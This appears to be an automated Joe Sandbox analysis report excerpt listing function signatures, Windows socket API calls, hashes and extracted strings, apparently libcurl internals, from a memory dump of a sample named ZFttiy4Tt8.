                                                              • Source File: 00000002.00000002.2285952660.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_df0000_ZFttiy4Tt8.jbxd
                                                              Similarity
                                                              • API ID: CloseOpenQueryValue
                                                              • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos$sts
                                                              • API String ID: 3677997916-4129964100
                                                              • Opcode ID: c382775a1cf5eba11d39204a19a10fc0d1ab52722fd1d07fe30c18a23603cd00
                                                              • Instruction ID: f88047c02c67f2a93a92074790db803f7ebd4f3c0e8e6e8d327efc80368f2a12
                                                              • Opcode Fuzzy Hash: c382775a1cf5eba11d39204a19a10fc0d1ab52722fd1d07fe30c18a23603cd00
                                                              • Instruction Fuzzy Hash: D03299B5904201ABEB11AB24EC52AAB76E4AF95318F085434FD49BB363F731ED14C793

                                                              Control-flow Graph: rendered graph not reproduced (entry block e28b50; executed / not-executed colouring lost in extraction)
                                                              APIs
                                                              • connect.WS2_32(?,?,00000001), ref: 00E28C2F
                                                              • SleepEx.KERNELBASE(00000000,00000000), ref: 00E28CF3
                                                              • getsockopt.WS2_32(?,0000FFFF,00001007,00000000,00000004), ref: 00E28D0E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2285952660.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_df0000_ZFttiy4Tt8.jbxd
                                                              Similarity
                                                              • API ID: Sleepconnectgetsockopt
                                                              • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                                              • API String ID: 1669343778-879669977
                                                              • Opcode ID: d7e3feb5b543e944c4d627a52c5c377b97e5e59d2eb22453c8b3ebfe6c3285e2
                                                              • Instruction ID: 5637fe4cfbe44776b2d5557d72ad7d9627fd39af1ebbc04941da9fa8ab30f215
                                                              • Opcode Fuzzy Hash: d7e3feb5b543e944c4d627a52c5c377b97e5e59d2eb22453c8b3ebfe6c3285e2
                                                              • Instruction Fuzzy Hash: 81B1F5746053059FD710CF24EE85BA7B7E4AF44318F08A62CE8596B2D2DB70EC58C762

                                                              Control-flow Graph: rendered graph not reproduced (entry block df2f17; executed / not-executed colouring lost in extraction)
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2285952660.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_df0000_ZFttiy4Tt8.jbxd
                                                              Similarity
                                                              • API ID: CloseEnumOpen
                                                              • String ID: d
                                                              • API String ID: 1332880857-2564639436
                                                              • Opcode ID: d2cfc226f158f13973f52986552cb43515695eb2d40b69c2d3dd3d61180be5bd
                                                              • Instruction ID: 20924481e6d29a255b86acad408b6e000845194143280aa249d0b80b29c36537
                                                              • Opcode Fuzzy Hash: d2cfc226f158f13973f52986552cb43515695eb2d40b69c2d3dd3d61180be5bd
                                                              • Instruction Fuzzy Hash: 2B71D5B49043199FDB50DF69D4847AEBBF0BF84308F11885DE99897304E7749A88CF92

                                                              Control-flow Graph: rendered graph not reproduced (entry block e29290; executed / not-executed colouring lost in extraction)
                                                              APIs
                                                              • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 00E2935C
                                                              • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 00E29389
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2285952660.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_df0000_ZFttiy4Tt8.jbxd
                                                              Similarity
                                                              • API ID: Ioctlsetsockopt
                                                              • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                                              • API String ID: 1903391676-2691795271
                                                              • Opcode ID: a7e54114a1f40d230bb2f07195486cb20b0077794dc8da9c203235d05931d2a1
                                                              • Instruction ID: 5b89bb675c53e41ab9f64487437e3160beadb1e5d43f734922cb2ef019cc8b60
                                                              • Opcode Fuzzy Hash: a7e54114a1f40d230bb2f07195486cb20b0077794dc8da9c203235d05931d2a1
                                                              • Instruction Fuzzy Hash: 2251F371604305ABE710DF24CC81FAAB7A5FF84318F14A52DFD58AB282E730E991CB91

                                                              Control-flow Graph: rendered graph not reproduced (entry block df76a0; executed / not-executed colouring lost in extraction)
                                                              APIs
                                                              • send.WS2_32(multi.c,?,?,?,00DF3D4E,00000000,?,?,00E007BF), ref: 00DF76EB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2285952660.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_df0000_ZFttiy4Tt8.jbxd
                                                              Similarity
                                                              • API ID: send
                                                              • String ID: LIMIT %s:%d %s reached memlimit$SEND %s:%d send(%lu) = %ld$multi.c$send
                                                              • API String ID: 2809346765-3388739168

                                                              Control-flow Graph
                                                              • [Graph image not reproduced: control-flow graph of the function at 0x00DF7770 calling recv, with executed and not-executed basic blocks highlighted]
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2285952660.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_df0000_ZFttiy4Tt8.jbxd
                                                              Similarity
                                                              • API ID: recv
                                                              • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                                              • API String ID: 1507349165-640788491

                                                              Control-flow Graph
                                                              • [Graph image not reproduced: control-flow graph of the function at 0x00DF75E0 calling socket, with executed and not-executed basic blocks highlighted]
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2285952660.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_df0000_ZFttiy4Tt8.jbxd
                                                              Similarity
                                                              • API ID: socket
                                                              • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                                              • API String ID: 98920635-842387772

                                                              Control-flow Graph
                                                              • [Graph image not reproduced: control-flow graph of the function at 0x00E2A150 calling getsockname, with executed and not-executed basic blocks highlighted]
                                                              APIs
                                                              • getsockname.WS2_32(?,?,00000080), ref: 00E2A1C7
                                                              Strings
                                                              • ssloc inet_ntop() failed with errno %d: %s, xrefs: 00E2A23B
                                                              • getsockname() failed with errno %d: %s, xrefs: 00E2A1F0
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2285952660.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_df0000_ZFttiy4Tt8.jbxd
                                                              Similarity
                                                              • API ID: getsockname
                                                              • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                                              • API String ID: 3358416759-2605427207

                                                              Control-flow Graph
                                                              • [Graph image not reproduced: control-flow graph of the function at 0x00E0D5E0 calling WSAStartup, with executed and not-executed basic blocks highlighted]
                                                              APIs
                                                              • WSAStartup.WS2_32(00000202), ref: 00E0D65B
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2285952660.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_df0000_ZFttiy4Tt8.jbxd
                                                              Similarity
                                                              • API ID: Startup
                                                              • String ID: if_nametoindex$iphlpapi.dll
                                                              • API String ID: 724789610-3097795196

                                                              Control-flow Graph
                                                              • [Graph image not reproduced: control-flow graph of the function at 0x00EBAA30 calling socket, ioctlsocket and connect, with executed and not-executed basic blocks highlighted]
                                                              APIs
                                                              • socket.WS2_32(FFFFFFFF,?,00000000), ref: 00EBAB9B
                                                              • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 00EBABE3
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2285952660.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_df0000_ZFttiy4Tt8.jbxd
                                                              Similarity
                                                              • API ID: ioctlsocketsocket
                                                              • String ID:
                                                              • API String ID: 416004797-0
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2285952660.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_df0000_ZFttiy4Tt8.jbxd
                                                              Similarity
                                                              • API ID: closesocket
                                                              • String ID: FD %s:%d sclose(%d)
                                                              • API String ID: 2781271927-3116021458
APIs
• connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,00EBB29E,?,00000000,?,?), ref: 00EBB0BA
• WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,00EA3C41,00000000), ref: 00EBB0C1
Similarity
• API ID: ErrorLastconnect
• String ID:
• API String ID: 374722065-0
APIs
• gethostname.WS2_32(00000000,00000040), ref: 00EA4AA5
Similarity
• API ID: gethostname
• String ID:
• API String ID: 144339138-0
APIs
• getsockname.WS2_32(?,?,00000080), ref: 00EBAFD1
Similarity
• API ID: getsockname
• String ID:
• API String ID: 3358416759-0
APIs
• send.WS2_32(?,?,?,00000000,00000000,?), ref: 00EBA97F
Similarity
• API ID: send
• String ID:
• API String ID: 2809346765-0
APIs
• socket.WS2_32(?,00EBB280,00000000,-00000001,00000000,00EBB280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 00EBAF66
Similarity
• API ID: socket
• String ID:
• API String ID: 98920635-0
APIs
• closesocket.WS2_32(?,00EB9422,?,?,?,?,?,?,?,?,?,?,?,w3,01284C60,00000000), ref: 00EBB04C
Similarity
• API ID: closesocket
• String ID:
• API String ID: 2781271927-0
APIs
• ioctlsocket.WS2_32(?,8004667E,?,?,00E2AF56,?,00000001), ref: 00E567FC
Similarity
• API ID: ioctlsocket
• String ID:
• API String ID: 3577187118-0
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2285952660.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                              • Associated: 00000002.00000002.2285922534.0000000000DF0000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2285952660.00000000014C7000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2285952660.00000000014C9000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2286654277.00000000014CC000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2286678171.00000000014CE000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2286678171.000000000165E000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2286678171.0000000001778000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2286678171.000000000177E000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2286678171.000000000185C000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2286678171.0000000001864000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2286678171.0000000001873000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2287084745.0000000001874000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2287234009.0000000001A38000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2287255490.0000000001A3A000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_df0000_ZFttiy4Tt8.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle
                                                              • String ID:
                                                              • API String ID: 2962429428-0
                                                              • Opcode ID: a57ccf806f1a44bb291fb6a2a88e0df323152377d70229a2d4cbabb96cf8faf2
                                                              • Instruction ID: 9292735873265b3472a9a516c5e32a2f38167bc74fa98786acad8f5698f9e57d
                                                              • Opcode Fuzzy Hash: a57ccf806f1a44bb291fb6a2a88e0df323152377d70229a2d4cbabb96cf8faf2
                                                              • Instruction Fuzzy Hash: 2F31C6B49093159FDB00EFB8D5846AEBBF4BF44308F01886DD898A7300E7349A84CF52
                                                              APIs
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID:
                                                              • API String ID: 3472027048-0
                                                              • Opcode ID: 325a0ad6e21001750eaa0ab27a04ae71d3dfe20f87f5fdd5c73126c60e684e37
                                                              • Instruction ID: efc93b92a1e806d38a656ba736c5bb160e6983c17df2d9222673d27db018dc32
                                                              • Opcode Fuzzy Hash: 325a0ad6e21001750eaa0ab27a04ae71d3dfe20f87f5fdd5c73126c60e684e37
                                                              • Instruction Fuzzy Hash: E4C04CA0C1464446DB44BA38894651D79F57741104FC11A69998496299FA6893288667
                                                              Strings
                                                              Similarity
                                                              • API ID:
                                                              • String ID: #HttpOnly_$%s cookie %s="%s" for domain %s, path %s, expire %lld$;=$;$=$Added$FALSE$Replaced$TRUE$__Host-$__Secure-$cookie '%s' dropped, domain '%s' must not set cookies for '%s'$cookie '%s' for domain '%s' dropped, would overlay an existing cookie$cookie contains TAB, dropping$cookie.c$domain$expires$httponly$invalid octets in name/value, cookie dropped$libpsl problem, rejecting cookie for satety$max-age$oversized cookie dropped, name/val %zu + %zu bytes$path$secure$skipped cookie with bad tailmatch domain: %s$version
                                                              • API String ID: 0-1371176463
                                                              • Opcode ID: daaf9c8238eaa0bbb4e06aa8e29f21f44cc908aa8ca99e198fb26da099dfcb50
                                                              • Instruction ID: 5f386838e4a830239312e789d3aa96c5fe0b1392c00f85be112c62431f8f2645
                                                              • Opcode Fuzzy Hash: daaf9c8238eaa0bbb4e06aa8e29f21f44cc908aa8ca99e198fb26da099dfcb50
                                                              • Instruction Fuzzy Hash: 7CB25870A08301ABE724AA24DC4AB66BFD4AF5431CF08553CEAC9B7382E775EC54D752
                                                              Strings
                                                              Similarity
                                                              • API ID:
                                                              • String ID: %3lld %s %3lld %s %3lld %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$%2lld:%02lld:%02lld$%3lldd %02lldh$%7lldd$** Resuming transfer from byte position %lld$--:-$--:-$--:-$-:--$-:--$-:--$Callback aborted
                                                              • API String ID: 0-122532811
                                                              • Opcode ID: 116c969af02a620678538a527cc878fab7377c3c773ff36712eb3f2e3940e629
                                                              • Instruction ID: d1b05df7ee67e2e7d18152aa32a81caf854a4ae4fcda2593423e7d85a5441e91
                                                              • Opcode Fuzzy Hash: 116c969af02a620678538a527cc878fab7377c3c773ff36712eb3f2e3940e629
                                                              • Instruction Fuzzy Hash: 3E4218B2B08701AFD718DE24CC41BABB6EAEFC4704F04992CF549973D1E775A9508B92
                                                              Strings
                                                              Similarity
                                                              • API ID:
                                                              • String ID: -vc$ans$ate$attempts$ndot$out$retr$retr$rota$time$use-$usev
                                                              • API String ID: 0-1574211403
                                                              • Opcode ID: 7b7832e072cc1f40625f4ab426ec306621ece8d48f01deb1bed98a7bbe002ed6
                                                              • Instruction ID: 199bf52a04ed54f0f3b7c0eb66937b75bfe7a48de7617988bdfc88f7049d2bfe
                                                              • Opcode Fuzzy Hash: 7b7832e072cc1f40625f4ab426ec306621ece8d48f01deb1bed98a7bbe002ed6
                                                              • Instruction Fuzzy Hash: B9610CA5B0830167E714A620AC52B7B76D99BDA308F14643DFC4ABA393FE75FD048253
                                                              Strings
                                                              Similarity
                                                              • API ID:
                                                              • String ID: %.*s%%25%s]$%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s$%s://$:;@?+$file$file://%s%s%s$https$urlapi.c$xn--
                                                              • API String ID: 0-1914377741
                                                              • Opcode ID: 1b5d30a2250cf55dd7007f87f11804b70910888740af93be53d1f978757b628b
                                                              • Instruction ID: 8b22f918542ee552eab6236adda96744d3711b3236d9fa0d7f5342c6d3f5ae7e
                                                              • Opcode Fuzzy Hash: 1b5d30a2250cf55dd7007f87f11804b70910888740af93be53d1f978757b628b
                                                              • Instruction Fuzzy Hash: DD722932608B41DFE7358A28C5467E7B7D29FD1348F08A61CED856B292E776D8C4C782
                                                              Strings
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $.$;$?$?$xn--$xn--
                                                              • API String ID: 0-543057197
                                                              • Opcode ID: 5e94bb0e852399c8b4900deb8cfcfd9b690edf1d566a61096a4d09037ca76da8
                                                              • Instruction ID: 25febeb5f8741b8536b51104b885dae956f9287e010de2a9a77f1743659880b6
                                                              • Opcode Fuzzy Hash: 5e94bb0e852399c8b4900deb8cfcfd9b690edf1d566a61096a4d09037ca76da8
                                                              • Instruction Fuzzy Hash: CA2207B2A043019BEB249A24DC41BAB77E5AFD434CF04553CF899B72A2EB35DD05C792
                                                              Strings
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                                              • API String ID: 0-2555271450
                                                              • Opcode ID: 2040e95e0dbb5572827a9278cfca3e933b7ce09a6931b8f07b24394f465e8572
                                                              • Instruction ID: 75d203c1a48e7afeb75d12e5d35174c6a242994a49b2d686a8991f4fd88df983
                                                              • Opcode Fuzzy Hash: 2040e95e0dbb5572827a9278cfca3e933b7ce09a6931b8f07b24394f465e8572
                                                              • Instruction Fuzzy Hash: 2CC28D716083498FC714CF28C49066AB7E2EFC9364F1AC92EE9D99B351D730ED458B92
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2285952660.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                              • Associated: 00000002.00000002.2285922534.0000000000DF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286654277.00000000014CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001778000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000177E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000185C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001864000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001873000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287084745.0000000001874000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287234009.0000000001A38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287255490.0000000001A3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_df0000_ZFttiy4Tt8.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                                              • API String ID: 0-2555271450
                                                              • Opcode ID: b80f17e7e9698ef1dd09ef8e3da11758ba59082d77c30a4b2d83838215ccced9
                                                              • Instruction ID: 84a09e94fc4ecd2d787e58800254190a6b3a9e4c343f130ff99b98251cd0f42a
                                                              • Opcode Fuzzy Hash: b80f17e7e9698ef1dd09ef8e3da11758ba59082d77c30a4b2d83838215ccced9
                                                              • Instruction Fuzzy Hash: 1F827D71A083059FD714CF28C88472BB7E1AFD5724F19CA2DEAA9973A1D730DC458B62
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2285952660.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                              • Associated: 00000002.00000002.2285922534.0000000000DF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286654277.00000000014CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001778000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000177E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000185C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001864000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001873000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287084745.0000000001874000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287234009.0000000001A38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287255490.0000000001A3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_df0000_ZFttiy4Tt8.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: default$login$macdef$machine$netrc.c$password
                                                              • API String ID: 0-1043775505
                                                              • Opcode ID: abf3728056eb239d2e1b056bc581da8043f774cf496338268fd1ee1bab4ba924
                                                              • Instruction ID: a5076c82619c1fe8d5a3741a09cc8c2300e061baa90fe05cad7615e1f7fc8f89
                                                              • Opcode Fuzzy Hash: abf3728056eb239d2e1b056bc581da8043f774cf496338268fd1ee1bab4ba924
                                                              • Instruction Fuzzy Hash: 01E1E37090C3419BE7218F14D88576BBBD4AF8570EF946C6CFC8567282E3B9994CC7A2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2285952660.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                              • Associated: 00000002.00000002.2285922534.0000000000DF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286654277.00000000014CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001778000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000177E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000185C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001864000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001873000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287084745.0000000001874000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287234009.0000000001A38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287255490.0000000001A3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_df0000_ZFttiy4Tt8.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ????$Invalid input packet$SMB upload needs to know the size up front$\$\\
                                                              • API String ID: 0-4201740241
                                                              • Opcode ID: 9eaa5c6aade9ff573f469c3033341d80473407d706a45829715c48fb00bd8b89
                                                              • Instruction ID: 339b72fa0d9d5be0079e0cab2fc3f326e1398522e17b16751f31f4b1fd550253
                                                              • Opcode Fuzzy Hash: 9eaa5c6aade9ff573f469c3033341d80473407d706a45829715c48fb00bd8b89
                                                              • Instruction Fuzzy Hash: 5D62D0B05147419BD714CF20C4907AAB7E4FF98304F049A2DEC8D9B352E774EA98CB96
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2285952660.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                              • Associated: 00000002.00000002.2285922534.0000000000DF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286654277.00000000014CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001778000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000177E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000185C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001864000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001873000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287084745.0000000001874000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287234009.0000000001A38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287255490.0000000001A3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_df0000_ZFttiy4Tt8.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $d$nil)
                                                              • API String ID: 0-394766432
                                                              • Opcode ID: 077aa1197da10eb1819d86e28d4e8bef7102da53fd8ac3ce15a6c323bd35dfca
                                                              • Instruction ID: da62e37aff41e62b538f7aa5269e4f62a945e8635980dddabceaa136fd9d9756
                                                              • Opcode Fuzzy Hash: 077aa1197da10eb1819d86e28d4e8bef7102da53fd8ac3ce15a6c323bd35dfca
                                                              • Instruction Fuzzy Hash: B9137B706093468FD728DF28C08462BBBF1BF89314F15896DE9959B361D771E84ACF82
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2285952660.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                              • Associated: 00000002.00000002.2285922534.0000000000DF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286654277.00000000014CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
